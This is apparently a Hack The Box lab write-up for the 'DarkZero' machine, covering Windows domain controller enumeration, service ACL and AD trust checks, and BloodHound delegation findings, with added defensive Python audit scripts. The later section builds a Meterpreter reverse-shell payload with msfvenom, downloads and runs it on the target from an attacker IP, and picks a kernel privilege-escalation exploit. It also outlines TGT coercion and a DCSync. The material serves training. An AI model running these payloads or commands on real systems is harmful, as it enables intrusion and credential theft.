MACHINE\System\CurrentControlSet\Control\Session Manager\Kernel\ObCaseInsensitive=4,1
MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown=4,0
MACHINE\System\CurrentControlSet\Control\Session Manager\ProtectionMode=4,1
MACHINE\System\CurrentControlSet\Control\Session Manager\SubSystems\optional=7,
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\AutoDisconnect=4,15
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableForcedLogOff=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\NullSessionPipes=7,,netlogon,samr,lsarpc
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RestrictNullSessAccess=4,1
MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\EnablePlainTextPassword=4,0
MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\EnableSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\RequireSecuritySignature=4,0
MACHINE\System\CurrentControlSet\Services\LDAP\LDAPClientIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange=4,0
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\MaximumPasswordAge=4,30
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireStrongKey=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SealSecureChannel=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SignSecureChannel=4,1
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,*S-1-5-11,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-9
SeMachineAccountPrivilege = *S-1-5-11
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-11,*S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-32-554,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeSystemtimePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549
SeAuditPrivilege = *S-1-5-19,*S-1-5-20
SeIncreaseQuotaPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeIncreaseBasePriorityPrivilege = *S-1-5-32-544,*S-1-5-90-0
SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550
SeBatchLogonRight = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-559
SeServiceLogonRight = *S-1-5-20,svc_sql,SQLServer2005SQLBrowserUser$DC02,*S-1-5-80-0,*S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-548,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551,*S-1-5-9
SeSecurityPrivilege = *S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-32-544,*S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430,*S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-551
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549,*S-1-5-32-550,*S-1-5-32-551
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
SeManageVolumePrivilege = *S-1-5-32-544
SeRemoteInteractiveLogonRight = *S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
SeIncreaseWorkingSetPrivilege = *S-1-5-32-545
SeTimeZonePrivilege = *S-1-5-19,*S-1-5-32-544,*S-1-5-32-549
SeCreateSymbolicLinkPrivilege = *S-1-5-32-544
SeDelegateSessionUserImpersonatePrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
- The next idea was to escalate my privileges to `SYSTEM` through the `MSSQL` service itself. Unfortunately, I was not allowed to restart or reconfigure the service. The registry ACLs on the service keys only give `Authenticated Users` read access (`-2147483648` is `GENERIC_READ`, inherit-only, plus `ReadKey`), and the service DACL below grants the service-logon trustee `SU` (which is what `svc_sql` runs as) and interactive users `IU` only query rights (`CC`, `LC`, `SW`, `LO`, `CR`, `RC`): start/stop (`RP`/`WP`), change-config (`DC`) and `WRITE_DAC`/`WRITE_OWNER` are reserved for `SYSTEM`, `Administrators` and `Server Operators`.
PS C:\> Get-Service | ForEach-Object {
    $svc = $_
    $acl = Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" -ErrorAction SilentlyContinue
    if ($acl) {
        $acl.Access | Where-Object {$_.IdentityReference -like "*svc_sql*" -or $_.IdentityReference -like "*Domain Users*" -or $_.IdentityReference -like "*Authenticated Users*"}
    }
}

RegistryRights    : -2147483648
AccessControlType : Allow
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited       : False
InheritanceFlags  : ContainerInherit
PropagationFlags  : InheritOnly

RegistryRights    : ReadKey
AccessControlType : Allow
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None
PS C:\> sc.exe sdshow MSSQLSERVER
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)
PS C:\> sc.exe qc MSSQLSERVER
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MSSQLSERVER
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SQL Server (MSSQLSERVER)
DEPENDENCIES : KEYISO
SERVICE_START_NAME : darkzero-ext\svc_sql
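As an added example (not from the original write-up), the following Python decodes a service DACL like the one `sc.exe sdshow MSSQLSERVER` returned above and lists, per trustee, the rights that would allow starting, stopping, reconfiguring or taking over the service. The token meanings are the documented SDDL mappings for service objects; the descriptor string is copied from the output above, and the trustee abbreviation table covers only well-known SIDs (anything else is reported verbatim).

```python
"""Decode the DACL of a Windows service security descriptor (the SDDL string
`sc.exe sdshow` prints) and list, per trustee, the rights that allow starting,
stopping, reconfiguring or taking over the service."""
import re

# SDDL right tokens with their meaning and bit value for *service* objects
# (the same two-letter tokens mean something else on files or registry keys).
SERVICE_RIGHTS = {
    "CC": ("SERVICE_QUERY_CONFIG", 0x0001), "DC": ("SERVICE_CHANGE_CONFIG", 0x0002),
    "LC": ("SERVICE_QUERY_STATUS", 0x0004), "SW": ("SERVICE_ENUMERATE_DEPENDENTS", 0x0008),
    "RP": ("SERVICE_START", 0x0010), "WP": ("SERVICE_STOP", 0x0020),
    "DT": ("SERVICE_PAUSE_CONTINUE", 0x0040), "LO": ("SERVICE_INTERROGATE", 0x0080),
    "CR": ("SERVICE_USER_DEFINED_CONTROL", 0x0100), "SD": ("DELETE", 0x10000),
    "RC": ("READ_CONTROL", 0x20000), "WD": ("WRITE_DAC", 0x40000),
    "WO": ("WRITE_OWNER", 0x80000),
}
# Well-known trustee abbreviations; anything else (e.g. a full SID) is kept verbatim.
TRUSTEES = {
    "SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
    "IU": "NT AUTHORITY\\INTERACTIVE", "SU": "NT AUTHORITY\\SERVICE",
    "SO": "BUILTIN\\Server Operators", "AU": "NT AUTHORITY\\Authenticated Users",
    "WD": "Everyone", "BU": "BUILTIN\\Users",
}
# Rights that let a principal restart the service, repoint its binary, or
# rewrite its security descriptor.
DANGEROUS = {"SERVICE_START", "SERVICE_STOP", "SERVICE_CHANGE_CONFIG",
             "WRITE_DAC", "WRITE_OWNER", "DELETE"}
# ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee
ACE_RE = re.compile(r"\((A|D);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def _rights(rights: str) -> set:
    """Expand either the two-letter token form or the hex mask form."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for name, bit in SERVICE_RIGHTS.values() if mask & bit}
    return {SERVICE_RIGHTS.get(rights[i:i + 2], (rights[i:i + 2], 0))[0]
            for i in range(0, len(rights), 2)}


def parse_service_sddl(sddl: str) -> dict:
    """{trustee: set(rights)} from the Allow ACEs of the DACL; Deny ACEs are skipped."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]                    # drop a trailing SACL if present
    grants = {}
    for ace_type, _flags, rights, _obj, _inh_obj, trustee in ACE_RE.findall(dacl):
        if ace_type != "A":
            continue
        grants.setdefault(TRUSTEES.get(trustee, trustee), set()).update(_rights(rights))
    return grants


def who_can_abuse(sddl: str) -> dict:
    """Trustees holding any DANGEROUS right, with just those rights."""
    return {t: r & DANGEROUS for t, r in parse_service_sddl(sddl).items() if r & DANGEROUS}


# The MSSQLSERVER descriptor as returned by `sc.exe sdshow` in this write-up.
MSSQLSERVER_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)")

if __name__ == "__main__":
    for trustee, rights in sorted(who_can_abuse(MSSQLSERVER_SDDL).items()):
        print(f"{trustee}: {', '.join(sorted(rights))}")
    for trustee in ("NT AUTHORITY\\SERVICE", "NT AUTHORITY\\INTERACTIVE"):
        print(f"{trustee}: {sorted(parse_service_sddl(MSSQLSERVER_SDDL)[trustee])}")
```

Run against the descriptor above, `who_can_abuse` lists only SYSTEM (start/stop), Administrators and Server Operators; the `SERVICE` and `INTERACTIVE` trustees never appear, which is the ACL-level reason the `svc_sql` shell could not restart the service. Feed it the output of `sc.exe sdshow <name>` for any other service to spot one that grants `SERVICE_CHANGE_CONFIG` or `WRITE_DAC` to a low-privileged group.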
- Since I had to deal with two DCs, I checked the Active Directory trust status and noticed that there was indeed a domain trust between DC01 and DC02. Conveniently, the domains were named `darkzero.htb` and `darkzero.ext`. Seen from DC02, the trust is bidirectional and forest-transitive (`TrustAttributes : 8` is `TRUST_ATTRIBUTE_FOREST_TRANSITIVE`), with no selective authentication.
PS C:\temp> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=darkzero.htb,CN=System,DC=darkzero,DC=ext
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : darkzero.htb
ObjectClass : trustedDomain
ObjectGUID : 700b5e64-8ae9-4528-a968-26e2b4a44509
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=darkzero,DC=ext
Target : darkzero.htb
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
- I then used `bloodhound-python` to dump the Active Directory configuration of `darkzero.htb` and switch perspective.
┌──(kali@kali)-[/media/…/HTB/Machines/DarkZero/files]
└─$ bloodhound-python -u 'john.w' -p 'RFulUtONCOL!' -d 'darkzero.htb' -ns 10.129.174.93 -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: darkzero.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.darkzero.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.darkzero.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 5 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.darkzero.htb
INFO: Done in 00M 05S
- My main focus was to find a way back to DC01 and to get a foothold on it through DC02, on which I already had a shell. So I searched through the `*.computers.json` and found that DC01 was configured for Unconstrained Delegation (`"unconstraineddelegation": true`).
┌──(kali@kali)-[/media/…/HTB/Machines/DarkZero/files]
└─$ cat 20251005133830_computers.json
{"data":[{"ObjectIdentifier": "S-1-5-21-1152179935-589108180-1989892463-1000", "AllowedToAct": [], "PrimaryGroupSID": "S-1-5-21-1152179935-589108180-1989892463-516", "LocalAdmins": {"Collected": true, "FailureReason": null, "Results": [{"ObjectIdentifier": "S-1-5-21-1152179935-589108180-1989892463-500", "ObjectType": "User"}, {"ObjectIdentifier": "S-1-5-21-1152179935-589108180-1989892463-519", "ObjectType": "Group"}, {"ObjectIdentifier": "S-1-5-21-1152179935-589108180-1989892463-512", "ObjectType": "Group"}]}, "PSRemoteUsers": {"Collected": true, "FailureReason": null, "Results": []}, "Properties": {"name": "DC01.DARKZERO.HTB", "domainsid": "S-1-5-21-1152179935-589108180-1989892463", "domain": "DARKZERO.HTB", "distinguishedname": "CN=DC01,OU=DOMAIN CONTROLLERS,DC=DARKZERO,DC=HTB", "unconstraineddelegation": true, "enabled": true, "trustedtoauth": false, "samaccountname": "DC01$", "haslaps": false, "lastlogon": 1759663368, "lastlogontimestamp": 1759429993, "pwdlastset": 1753789216, "whencreated": 1753789216, "serviceprincipalnames": ["Hyper-V Replica Service/DC01", "Hyper-V Replica Service/DC01.darkzero.htb", "Microsoft Virtual System Migration Service/DC01", "Microsoft Virtual System Migration Service/DC01.darkzero.htb", "Microsoft Virtual Console Service/DC01", "Microsoft Virtual Console Service/DC01.darkzero.htb", "Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.darkzero.htb", "ldap/DC01.darkzero.htb/ForestDnsZones.darkzero.htb", "ldap/DC01.darkzero.htb/DomainDnsZones.darkzero.htb", "DNS/DC01.darkzero.htb", "GC/DC01.darkzero.htb/darkzero.htb", "RestrictedKrbHost/DC01.darkzero.htb", "RestrictedKrbHost/DC01", "RPC/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb", "HOST/DC01/darkzero", "HOST/DC01.darkzero.htb/darkzero", "HOST/DC01", "HOST/DC01.darkzero.htb", "HOST/DC01.darkzero.htb/darkzero.htb", "E3514235-4B06-11D1-AB04-00C04FC2DCD2/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd/darkzero.htb", "ldap/DC01/darkzero", 
"ldap/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb", "ldap/DC01.darkzero.htb/darkzero", "ldap/DC01", "ldap/DC01.darkzero.htb", "ldap/DC01.darkzero.htb/darkzero.htb"], "description": null, "operatingsystem": "Windows Server 2025 Datacenter", "sidhistory": []}, "RemoteDesktopUsers": {"Collected": true, "FailureReason": null, "Results": []}, "DcomUsers": {"Collected": true, "FailureReason": null, "Results": []}, "AllowedToDelegate": [], "Sessions": {"Collected": true, "FailureReason": null, "Results": []}, "PrivilegedSessions": {"Collected": false, "FailureReason": null, "Results": []}, "RegistrySessions": {"Collected": false, "FailureReason": null, "Results": []}, "Aces": [{"RightName": "Owns", "IsInherited": false, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-512", "PrincipalType": "Group"}, {"RightName": "GenericAll", "IsInherited": false, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-512", "PrincipalType": "Group"}, {"RightName": "AddKeyCredentialLink", "IsInherited": true, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-526", "PrincipalType": "Group"}, {"RightName": "AddKeyCredentialLink", "IsInherited": true, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-527", "PrincipalType": "Group"}, {"RightName": "GenericAll", "IsInherited": true, "PrincipalSID": "S-1-5-21-1152179935-589108180-1989892463-519", "PrincipalType": "Group"}, {"RightName": "GenericWrite", "IsInherited": true, "PrincipalSID": "DARKZERO.HTB-S-1-5-32-544", "PrincipalType": "Group"}, {"RightName": "WriteOwner", "IsInherited": true, "PrincipalSID": "DARKZERO.HTB-S-1-5-32-544", "PrincipalType": "Group"}, {"RightName": "WriteDacl", "IsInherited": true, "PrincipalSID": "DARKZERO.HTB-S-1-5-32-544", "PrincipalType": "Group"}], "HasSIDHistory": [], "IsDeleted": false, "Status": null, "IsACLProtected": false}],"meta":{"methods":0,"type":"computers","count":1, "version":5}}
<--- CUT FOR BREVITY --->
"Properties": {
    "name": "DC01.DARKZERO.HTB",
    "unconstraineddelegation": true,   // ← THIS
    "enabled": true,
<--- CUT FOR BREVITY --->
- This meant that if I could find a way to catch a Kerberos ticket from DC01 on DC02, ultimately through coercion, I could then use it to run a DCSync and grab the hash of the Administrator account of DC01. The mechanism: when an account authenticates to a host that is trusted for unconstrained delegation, a forwarded copy of its TGT is sent along with the service ticket and cached in that host's LSASS. Domain controllers are trusted for unconstrained delegation by default, so coercing `DC01$` into authenticating to DC02 would leave `DC01$`'s TGT on DC02, readable by SYSTEM.
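The JSON above is raw collector output; as an added example (not part of the write-up or of BloodHound itself), here is a small Python audit that reads a legacy `computers.json`, reports each host's delegation posture (unconstrained, constrained delegation targets, RBCD principals, protocol transition) and marks domain controllers, which carry unconstrained delegation by default, so that the non-DC hits stand out. The embedded sample is constructed: DC01 uses the values BloodHound reported above, while `SQL03` and `WEB04` are hypothetical hosts added only to exercise the other cases.

```python
"""Audit Kerberos delegation in a BloodHound legacy (v5 JSON) computers file:
unconstrained delegation, constrained delegation targets, RBCD principals and
protocol transition, marking domain controllers, which are trusted for
unconstrained delegation by default, so that non-DC hits stand out."""
import json
import sys

DOMAIN_CONTROLLERS_RID = "516"   # primary group "Domain Controllers"


def _identifiers(entries) -> list:
    """AllowedToDelegate / AllowedToAct hold typed principals
    ({"ObjectIdentifier": ..., "ObjectType": ...}); tolerate bare SIDs too."""
    return [e.get("ObjectIdentifier") if isinstance(e, dict) else e
            for e in entries or []]


def audit_delegation(computers_json: str) -> list:
    """One summary dict per computer object in the file."""
    report = []
    for comp in json.loads(computers_json)["data"]:
        props = comp.get("Properties", {})
        primary_group = comp.get("PrimaryGroupSID") or ""
        report.append({
            "name": props.get("name"),
            "is_dc": primary_group.rsplit("-", 1)[-1] == DOMAIN_CONTROLLERS_RID,
            "unconstrained": bool(props.get("unconstraineddelegation")),
            # trustedtoauth == TRUSTED_TO_AUTH_FOR_DELEGATION (S4U2Self protocol transition)
            "protocol_transition": bool(props.get("trustedtoauth")),
            "constrained_targets": _identifiers(comp.get("AllowedToDelegate")),
            "rbcd_principals": _identifiers(comp.get("AllowedToAct")),
        })
    return report


def unconstrained_hosts(computers_json: str, include_dcs: bool = True) -> list:
    """Hosts trusted for unconstrained delegation; include_dcs=False drops the
    domain controllers, which have it by design."""
    return [e["name"] for e in audit_delegation(computers_json)
            if e["unconstrained"] and (include_dcs or not e["is_dc"])]


def _host(name, rid, group_rid, unconstrained=False, trusted_to_auth=False,
          allowed_to_delegate=(), allowed_to_act=()):
    """Build one computer entry in the v5 layout (helper for the sample only)."""
    base = "S-1-5-21-1152179935-589108180-1989892463"
    typed = lambda rids: [{"ObjectIdentifier": f"{base}-{r}", "ObjectType": "Computer"} for r in rids]
    return {"ObjectIdentifier": f"{base}-{rid}", "PrimaryGroupSID": f"{base}-{group_rid}",
            "AllowedToDelegate": typed(allowed_to_delegate), "AllowedToAct": typed(allowed_to_act),
            "Properties": {"name": name, "unconstraineddelegation": unconstrained,
                           "trustedtoauth": trusted_to_auth}}


# Constructed sample: DC01 carries the values BloodHound reported for it; SQL03
# and WEB04 are hypothetical hosts added only to exercise the other cases.
SAMPLE_COMPUTERS_JSON = json.dumps({
    "data": [
        _host("DC01.DARKZERO.HTB", 1000, 516, unconstrained=True),
        _host("SQL03.DARKZERO.HTB", 1105, 515, unconstrained=True),
        _host("WEB04.DARKZERO.HTB", 1106, 515, trusted_to_auth=True,
              allowed_to_delegate=(1000,), allowed_to_act=(1105,)),
    ],
    "meta": {"methods": 0, "type": "computers", "count": 3, "version": 5},
})

if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_COMPUTERS_JSON
    for entry in audit_delegation(source):
        print(entry)
    print("unconstrained, non-DC:", unconstrained_hosts(source, include_dcs=False))
```

Run it as `python3 audit.py 20251005133830_computers.json` to process a real collection; without an argument it uses the constructed sample. On this box the only unconstrained host is DC01, a DC, so the finding is the default DC behaviour rather than a stray member server, which is why the attack path here goes through coercing a DC rather than compromising a delegating server.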
Privilege Escalation to SYSTEM on DC02
- First of all I needed to get `SYSTEM` on DC02. I fired up Metasploit, set up a handler, delivered a Meterpreter payload to DC02 and ran `local_exploit_suggester` from the resulting session.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ msfconsole
Metasploit tip: Use the resource command to run commands from a file
______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/
=[ metasploit v6.4.84-dev ]
+ -- --=[ 2,547 exploits - 1,309 auxiliary - 1,683 payloads ]
+ -- --=[ 432 post - 49 encoders - 13 nops - 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.10.16.45
LHOST => 10.10.16.45
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.45:4444
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.45 LPORT=4444 -f exe -o asdf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: asdf.exe
PS C:\temp> iwr 10.10.16.45/asdf.exe -o asdf.exe
PS C:\temp> .\asdf.exe
[*] Sending stage (203846 bytes) to 10.129.174.93
[*] Meterpreter session 2 opened (10.10.16.45:4444 -> 10.129.174.93:53722) at 2025-10-05 06:19:38 +0200
meterpreter >
- I sifted through the suggester output (below) and, after a bit of testing, settled on CVE-2024-30088, a flaw in the Windows kernel (the Metasploit module name, `authz_basep`, refers to the affected kernel code path) that allows token manipulation and ends in Local Privilege Escalation (LPE). Reference: CVE News on CVE-2024-30088.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 172.16.20.2 - Collecting local exploits for x64/windows...
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
[*] 172.16.20.2 - 206 exploit checks are being tried...
[+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30085_cloud_files: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 49 / 49
[*] 172.16.20.2 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
4 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
6 exploit/windows/local/cve_2024_30085_cloud_files Yes The target appears to be vulnerable.
7 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
8 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
9 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
10 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
11 exploit/windows/local/always_install_elevated No The target is not exploitable.
12 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
13 exploit/windows/local/bypassuac_comhijack No The target is not exploitable.
14 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/capcom_sys_exec No Cannot reliably check exploitability.
19 exploit/windows/local/cve_2019_1458_wizardopium No The target is not exploitable.
20 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows!
21 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
22 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
23 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 6.2.20348.2110
24 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
25 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
26 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
27 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
28 exploit/windows/local/cve_2021_40449 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
29 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
30 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
31 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
32 exploit/windows/local/ikeext_service No The check raised an exception.
33 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
34 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2022 (10.0 Build 20348). is not vulnerable
35 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability.
36 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
37 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability.
38 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable.
39 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
40 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
41 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
42 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
43 exploit/windows/local/panda_psevents No The target is not exploitable.
44 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
45 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
